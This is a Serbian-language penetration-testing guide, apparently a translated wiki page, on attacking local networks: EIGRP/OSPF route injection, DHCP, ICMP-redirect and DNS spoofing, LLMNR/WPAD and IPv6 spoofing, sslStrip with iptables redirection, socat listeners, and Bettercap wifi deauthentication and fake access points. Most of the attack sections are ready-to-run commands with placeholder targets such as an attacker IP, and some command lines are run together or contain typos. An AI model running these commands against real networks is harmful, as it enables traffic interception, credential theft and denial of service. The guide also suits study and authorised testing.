EIGRP (Enhanced Interior Gateway Routing Protocol) je dinamički rutirni protokol. To je distance-vector protokol. Ako nema autentikacije i konfiguracije pasivnih interfejsa, napadač može ometati EIGRP rutiranje i izazvati trovanje tabela rutiranja. Osim toga, EIGRP mreža (tj. autonomni sistem) je ravna i nema segmentaciju u zone. Ako napadač ubaci rutu, verovatno je da će se ova ruta proširiti kroz autonomni EIGRP sistem.

Napad na EIGRP sistem zahteva uspostavljanje susedstva sa legitimnim EIGRP ruterom, što otvara mnoge mogućnosti, od osnovnog izviđanja do različitih ubrizgavanja.

FRRouting vam omogućava da implementirate virtuelni ruter koji podržava BGP, OSPF, EIGRP, RIP i druge protokole. Sve što treba da uradite je da ga implementirate na sistemu napadača i zapravo možete se pretvarati da ste legitimni ruter u domenu rutiranja.

Coly ima mogućnosti za presretanje EIGRP (Enhanced Interior Gateway Routing Protocol) emitovanja. Takođe omogućava ubrizgavanje paketa, što se može koristiti za izmenu konfiguracija rutiranja.

OSPF

U Open Shortest Path First (OSPF) protokolu MD5 autentikacija se često koristi kako bi se osigurala sigurna komunikacija između rutera. Međutim, ova sigurnosna mera može biti kompromitovana korišćenjem alata poput Loki i John the Ripper. Ovi alati su sposobni da uhvate i dešifruju MD5 hešove, otkrivajući autentikacioni ključ. Kada se ovaj ključ dobije, može se koristiti za unošenje novih rutinskih informacija. Za konfigurisanje parametara rute i uspostavljanje kompromitovanog ključa, koriste se kartice Injection i Connection, redom.

• Hvatanje i Dešifrovanje MD5 Hešova: Alati poput Loki i John the Ripper se koriste u tu svrhu.

• Konfigurisanje Parametara Rute: To se radi putem kartice Injection.

• Postavljanje Kompromitovanog Ključa: Ključ se konfiguriše pod karticom Connection.

Ostali Generički Alati i Izvori

• Above: Alat za skeniranje mrežnog saobraćaja i pronalaženje ranjivosti

• Možete pronaći više informacija o mrežnim napadima ovde.

Falsifikovanje identiteta (Spoofing)

Napadač konfiguriše sve mrežne parametre (GW, IP, DNS) novog člana mreže slanjem lažnih DHCP odgovora.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Proverite prethodni odeljak.

ICMPRedirect

ICMP preusmeravanje se sastoji od slanja ICMP paketa tipa 1 kôda 5 koji ukazuje da je napadač najbolji način da se dođe do određene IP adrese. Zatim, kada žrtva želi da kontaktira tu IP adresu, poslaće paket preko napadača.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Prevara

Napadač će rešiti neke (ili sve) domene za koje žrtva traži.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Konfigurišite sopstveni DNS pomoću dnsmasq-a

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Lokalni prolazi

Često postoje više ruta do sistema i mreža. Nakon što napravite listu MAC adresa unutar lokalne mreže, koristite gateway-finder.py da identifikujete hostove koji podržavaju IPv4 prosleđivanje.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Falsifikovanje LLMNR, NBT-NS i mDNS

Za lokalno razrešavanje imena kada DNS upiti ne uspeju, Microsoft sistemi se oslanjaju na Link-Local Multicast Name Resolution (LLMNR) i NetBIOS Name Service (NBT-NS). Slično tome, Apple Bonjour i Linux zero-configuration implementacije koriste Multicast DNS (mDNS) za otkrivanje sistema unutar mreže. Zbog neautentifikovane prirode ovih protokola i njihovog rada preko UDP, emitovanjem poruka, oni mogu biti iskorišćeni od strane napadača koji ciljaju da preusmere korisnike ka zlonamernim servisima.

Možete se predstaviti kao servisi koje traže hostovi koristeći Responder za slanje lažnih odgovora. Pročitajte više informacija o kako se predstaviti kao servis pomoću Responder-a.

Falsifikovanje WPAD-a

Pregledači često koriste Web Proxy Auto-Discovery (WPAD) protokol za automatsko dobijanje podešavanja proksi servera. To uključuje dobijanje detalja konfiguracije sa servera, posebno putem URL-a poput "http://wpad.example.org/wpad.dat". Otkrivanje ovog servera od strane klijenata može se desiti putem različitih mehanizama:

• Putem DHCP, gde se otkrivanje olakšava korišćenjem specijalnog unosa koda 252.

• Preko DNS-a, što uključuje traženje imena hosta označenog sa wpad unutar lokalne domene.

• Putem Microsoft LLMNR i NBT-NS, koji su rezervni mehanizmi korišteni u slučajevima kada DNS upiti ne uspeju.

Alat Responder iskorišćava ovaj protokol delujući kao zlonamerni WPAD server. Koristi DHCP, DNS, LLMNR i NBT-NS da zavede klijente da se povežu sa njim. Da biste dublje istražili kako servisi mogu biti predstavljeni korišćenjem Responder-a proverite ovo.

Falsifikovanje SSDP i UPnP uređaja

Možete ponuditi različite servise u mreži kako biste prevarili korisnika da unese neke plain-text kredencijale. Više informacija o ovom napadu u Falsifikovanje SSDP i UPnP uređaja.

IPv6 Falsifikovanje Suseda

Ovaj napad je veoma sličan ARP Falsifikovanju ali u svetu IPv6. Možete naterati žrtvu da pomisli da IPv6 GW ima MAC adresu napadača.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Neke OS konfigurišu po difoltu gateway iz RA paketa poslatih u mreži. Da biste proglasili napadača kao IPv6 ruter možete koristiti:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

Podrazumevano, neki operativni sistemi pokušavaju da konfigurišu DNS čitanjem DHCPv6 paketa u mreži. Zatim, napadač može poslati DHCPv6 paket da se konfiguriše kao DNS. DHCP takođe pruža IPv6 adresu žrtvi.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (lažna stranica i ubacivanje JS koda)

Internet napadi

sslStrip

Osnovno što ovaj napad radi je, u slučaju da korisnik pokuša pristupiti HTTP stranici koja se preusmjerava na HTTPS verziju. sslStrip će održavati HTTP vezu sa klijentom i HTTPS vezu sa serverom tako da će moći da uhvati vezu u čistom tekstu.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Više informacija ovde.

sslStrip+ i dns2proxy za zaobilaženje HSTS

Razlika između sslStrip+ i dns2proxy u odnosu na sslStrip je što će preusmeriti na primer www.facebook.com na wwww.facebook.com (primetite dodatno slovo "w") i postaviće IP adresu ovog domena kao napadački IP. Na ovaj način, klijent će se povezati na wwww.facebook.com (napadača) ali iza kulisa sslstrip+ će održavati pravu vezu putem https sa www.facebook.com.

Cilj ove tehnike je da izbegne HSTS jer se wwww.facebook.com neće sačuvati u kešu pregledača, tako da će pregledač biti prevaren da izvrši autentikaciju na Facebook-u preko HTTP. Imajte na umu da bi se izveo ovaj napad, žrtva mora pokušati prvo da pristupi http://www.faceook.com a ne https. Ovo se može postići modifikovanjem linkova unutar http stranice.

Više informacija ovde, ovde i ovde.

sslStrip ili sslStrip+ više ne funkcionišu. To je zato što postoje HSTS pravila unapred sačuvana u pregledačima, tako da čak i ako je prvi put da korisnik pristupa "važnom" domenu, pristupiće mu putem HTTPS. Takođe, primetite da unapred sačuvana pravila i druga generisana pravila mogu koristiti zastavicu includeSubdomains tako da primer _wwww.facebook.com_ od ranije više neće funkcionisati jer facebook.com koristi HSTS sa includeSubdomains.

TODO: easy-creds, evilgrade, metasploit, factory

TCP slušanje na portu

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL slušanje na portu

Generisanje ključeva i samopotpisanog sertifikata

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Slušanje korišćenjem sertifikata

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Slušajte koristeći sertifikat i preusmerite ka hostovima

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Ponekad, ako klijent proveri da li je CA validan, možete poslužiti sertifikat drugog imena hosta potpisan od strane CA. Još jedan interesantan test je da poslužite sertifikat za traženi hostname ali samopotpisan.

Drugi testovi koje možete izvršiti su pokušaj potpisivanja sertifikata validnim sertifikatom koji nije validan CA. Ili korišćenje validnog javnog ključa, prisiljavanje korišćenja algoritma poput Diffie-Hellman-a (koji ne zahteva dešifrovanje bilo čega sa pravim privatnim ključem) i kada klijent zatraži probu pravog privatnog ključa (poput heša), poslati lažnu probu i očekivati da klijent to ne proveri.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Beleške o aktivnom otkrivanju

Imajte na umu da kada se UDP paket pošalje uređaju koji nema traženi port, šalje se ICMP (Port Unreachable).

ARP otkrivanje

ARP paketi se koriste za otkrivanje IP adresa koje se koriste unutar mreže. Računar mora poslati zahtev za svaku moguću IP adresu i samo će one koje se koriste odgovoriti.

mDNS (multicast DNS)

Bettercap šalje MDNS zahtev (svakih X ms) tražeći _services_.dns-sd._udp.local mašinu koja vidi ovaj paket obično odgovara na ovaj zahtev. Zatim, traži samo mašine koje odgovaraju na "services".

Alati

• Avahi-browser (--all)

• Bettercap (net.probe.mdns)

• Responder

NBNS (NetBios Name Server)

Bettercap emituje pakete na port 137/UDP tražeći ime "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap emituje SSDP pakete tražeći sve vrste servisa (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap emituje WSD pakete tražeći servise (UDP Port 3702).

Reference

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

• Network Security Assessment: Know Your Network (3. izdanje)

• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood

• https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Register - IntigritiRegister - Intigriti